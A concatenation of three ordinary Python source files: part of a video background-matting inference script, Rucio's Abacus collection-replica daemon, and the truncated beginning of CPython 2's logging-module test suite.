parser.add_argument('--model-refine-threshold', type=int, default=10) # model-refine-threshold / 100
parser.add_argument('--model-refine-kernel-size', type=int, default=3)
parser.add_argument('--video-src', type=str, required=True)
parser.add_argument('--video-bgr', type=str, required=True)
parser.add_argument('--video-target-bgr', type=str, default=None, help="Path to video onto which to composite the output (default to flat green)")
parser.add_argument('--video-resize', type=int, default=None, nargs=2)
parser.add_argument('--device', type=str, choices=['cpu', 'cuda'], default='cuda')
parser.add_argument('--preprocess-alignment', action='store_true')
parser.add_argument('--output-dir', type=str, required=True)
parser.add_argument('--output-types', type=str, required=True, nargs='+', choices=['com', 'pha', 'fgr', 'err', 'ref'])
parser.add_argument('--output-format', type=str, default='video', choices=['video', 'image_sequences'])
parser.add_argument('--pha-gain', type=float, default=1.0)
parser.add_argument('--precision', type=str, default='float32', choices=['float32', 'float16'])
parser.add_argument('--output-video-mbps', type=int, default=100)
args = parser.parse_args()
assert 'err' not in args.output_types or args.model_type in ['mattingbase', 'mattingrefine'], \
'Only mattingbase and mattingrefine support err output'
assert 'ref' not in args.output_types or args.model_type in ['mattingrefine'], \
'Only mattingrefine support ref output'
# --------------- Utils ---------------
# class VideoWriter:
# def __init__(self, path, frame_rate, width, height):
# self.out = cv2.VideoWriter(path, cv2.VideoWriter_fourcc(*'mp4v'), frame_rate, (width, height))
# def add_batch(self, frames):
# frames = frames.mul(255).byte()
# frames = frames.cpu().permute(0, 2, 3, 1).numpy()
# for i in range(frames.shape[0]):
# frame = frames[i]
# frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# self.out.write(frame)
class ImageSequenceWriter:
def __init__(self, path, extension):
self.path = path
self.extension = extension
self.index = 0
os.makedirs(path)
def add_batch(self, frames):
Thread(target=self._add_batch, args=(frames, self.index)).start()
self.index += frames.shape[0]
def _add_batch(self, frames, index):
frames = frames.cpu()
for i in range(frames.shape[0]):
frame = frames[i]
frame = to_pil_image(frame)
frame.save(os.path.join(self.path, str(index + i).zfill(5) + '.' + self.extension))
# --------------- Main ---------------
device = torch.device(args.device)
# Load model
if args.model_type == 'mattingbase':
model = MattingBase(args.model_backbone)
if args.model_type == 'mattingrefine':
model = MattingRefine(
args.model_backbone,
args.model_backbone_scale,
args.model_refine_mode,
args.model_refine_sample_pixels,
args.model_refine_threshold,
args.model_refine_kernel_size)
model.load_state_dict(torch.load(args.model_checkpoint, map_location=device), strict=False)
if args.precision == 'float32':
precision = torch.float32
else:
precision = torch.float16
model = model.eval().to(device=device, dtype=precision)
# Load video and background
vid = VideoDataset(args.video_src)
bgr = [Image.open(args.video_bgr).convert('RGB')]
dataset = ZipDataset([vid, bgr], transforms=A.PairCompose([
A.PairApply(T.Resize(args.video_resize[::-1]) if args.video_resize else nn.Identity()),
HomographicAlignment() if args.preprocess_alignment else A.PairApply(nn.Identity()),
A.PairApply(T.ToTensor())
]))
if args.video_target_bgr:
dataset = ZipDataset([dataset, VideoDataset(args.video_target_bgr, transforms=T.ToTensor())])
# Create output directory
if os.path.exists(args.output_dir):
if input(f'Directory {args.output_dir} already exists. Override? [Y/N]: ').lower() == 'y':
shutil.rmtree(args.output_dir)
else:
exit()
os.makedirs(args.output_dir)
# Prepare writers
if args.output_format == 'video':
h = args.video_resize[1] if args.video_resize is not None else vid.height
w = args.video_resize[0] if args.video_resize is not None else vid.width
frame_rate = vid.frame_rate
output_video_mbps = args.output_video_mbps
# gen output filename from video_src
basename_without_ext = os.path.splitext(os.path.basename(args.video_src))[0]
out_filename = basename_without_ext
if 'com' in args.output_types:
com_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_com.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
if 'pha' in args.output_types:
pha_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_pha.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
if 'fgr' in args.output_types:
fgr_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_fgr.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
if 'err' in args.output_types:
err_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_err.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
if 'ref' in args.output_types:
ref_writer = VideoWriter(path=os.path.join(args.output_dir, out_filename + '_ref.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
# # gen output filename from video_target_bgr
# root, ext = os.path.splitext(args.video_target_bgr)
# out_filename = root[1:]
# if 'com' in args.output_types:
# com_writer = VideoWriter(path=os.path.join(args.output_dir, "EP" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
# if 'pha' in args.output_types:
# pha_writer = VideoWriter(path=os.path.join(args.output_dir, "EK" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
# if 'fgr' in args.output_types:
# fgr_writer = VideoWriter(path=os.path.join(args.output_dir, "EF" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
# if 'err' in args.output_types:
# err_writer = VideoWriter(path=os.path.join(args.output_dir, "EE" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
# if 'ref' in args.output_types:
# ref_writer = VideoWriter(path=os.path.join(args.output_dir, "ER" + out_filename + '.mp4'), frame_rate=frame_rate, bit_rate=int(output_video_mbps * 1000000))
else:
if 'com' in args.output_types:
com_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'com'), 'png')
if 'pha' in args.output_types:
pha_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'pha'), 'jpg')
if 'fgr' in args.output_types:
fgr_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'fgr'), 'jpg')
if 'err' in args.output_types:
err_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'err'), 'jpg')
if 'ref' in args.output_types:
ref_writer = ImageSequenceWriter(os.path.join(args.output_dir, 'ref'), 'jpg')
# Conversion loop
try:
with torch.no_grad():
for input_batch in tqdm(DataLoader(dataset, batch_size=1, pin_memory=True)):
if args.video_target_bgr:
(src, bgr), tgt_bgr = input_batch
tgt_bgr = tgt_bgr.to(device, dtype=precision, non_blocking=True)
else:
src, bgr = input_batch
tgt_bgr = torch.tensor([120/255, 255/255, 155/255], device=device,dtype=precision).view(1, 3, 1, 1)
src = src.to(device, dtype=precision, non_blocking=True)
bgr = bgr.to(device, dtype=precision, non_blocking=True)
if args.model_type == 'mattingbase':
pha, fgr, err, _ = model(src, bgr)
elif args.model_type == 'mattingrefine':
if(REDUCED_OUTPUT):
if(PHA_ONLY):
# Reduced output to pha only
pha, _ = model(src, bgr)
else:
# Reduced output to pha and fgr
pha, fgr = model(src, bgr)
else:
pha, fgr, _, _, err, ref = model(src, bgr)
elif args.model_type == 'mattingbm':
pha, fgr = model(src, bgr)
# Apply gain to pha
pha = pha * args.pha_gain
pha = torch.clamp(pha, 0.0, 1.0)
if 'com' in args.output_types:
if args.output_format == 'video':
# Output composite with green background
com = fgr * pha + tgt_bgr * (1 - pha)
com_writer.write(com)
else:
# Output composite as rgba png images
com = torch.cat([fgr * pha.ne(0), pha], dim=1)
com_writer.write(com)
if 'pha' in args.output_types:
pha_writer.write(pha)
if 'fgr' in args.output_types:
fgr_writer.write(fgr)
if 'err' in args.output_types:
err_writer.write(F.interpolate(err, src.shape[2:], mode='bilinear', align_corners=False))
if 'ref' in args.output_types:
ref_writer.write(F.interpolate(ref, src.shape[2:], mode='nearest'))
finally:
# Clean up
if 'com' in args.output_types:
com_writer.close()
if 'pha' in args.output_types:
pha_writer.close()
if 'fgr' in args.output_types:
fgr_writer.close()
if 'err' in args.output_types:
err_writer.close()
if 'ref' in args.output_types:
ref_writer.close()
|
collection_replica.py | # -*- coding: utf-8 -*-
# Copyright 2018-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Martin Barisits <martin.barisits@cern.ch>, 2020
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2021
"""
Abacus-Collection-Replica is a daemon to update collection replica.
"""
import logging
import os
import socket
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging
from rucio.common.utils import daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.replica import get_cleaned_updated_collection_replicas, update_collection_replica
graceful_stop = threading.Event()
def collection_replica_update(once=False, limit=1000, sleep_time=10):
"""
Main loop to check and update the collection replicas.
"""
logging.info('collection_replica_update: starting')
logging.info('collection_replica_update: started')
# Make an initial heartbeat so that all abacus-collection-replica daemons have the correct worker number on the next try
executable = 'abacus-collection-replica'
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
while not graceful_stop.is_set():
try:
# Heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
# Select a bunch of collection replicas for to update for this worker
start = time.time() # NOQA
replicas = get_cleaned_updated_collection_replicas(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=limit)
logging.debug('Index query time %f size=%d' % (time.time() - start, len(replicas)))
# If the list is empty, sent the worker to sleep
if not replicas and not once:
logging.info('collection_replica_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
else:
for replica in replicas:
if graceful_stop.is_set():
break
start_time = time.time()
update_collection_replica(replica)
logging.debug('collection_replica_update[%s/%s]: update of collection replica "%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, replica['id'], time.time() - start_time))
if limit and len(replicas) < limit and not once:
daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
except Exception:
logging.error(traceback.format_exc())
if once:
break
logging.info('collection_replica_update: graceful stop requested')
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
logging.info('collection_replica_update: graceful stop done')
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, limit=1000):
"""
Starts up the Abacus-Collection-Replica threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'abacus-collection-replica'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
logging.info('main: executing one iteration only')
collection_replica_update(once)
else:
logging.info('main: starting threads')
threads = [threading.Thread(target=collection_replica_update, kwargs={'once': once, 'sleep_time': sleep_time, 'limit': limit})
for _ in range(0, threads)]
[t.start() for t in threads]
logging.info('main: waiting for interrupts')
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
test_logging.py | #!/usr/bin/env python
#
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import copy
import cPickle
import cStringIO
import gc
import os
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import string
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import threading
import time
import types
import unittest
import warnings
import weakref
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEquals(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEquals(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
def apply_config(self, conf):
try:
fn = tempfile.mktemp(".ini")
f = open(fn, "w")
f.write(textwrap.dedent(conf))
f.close()
logging.config.fileConfig(fn)
finally:
os.remove(fn)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
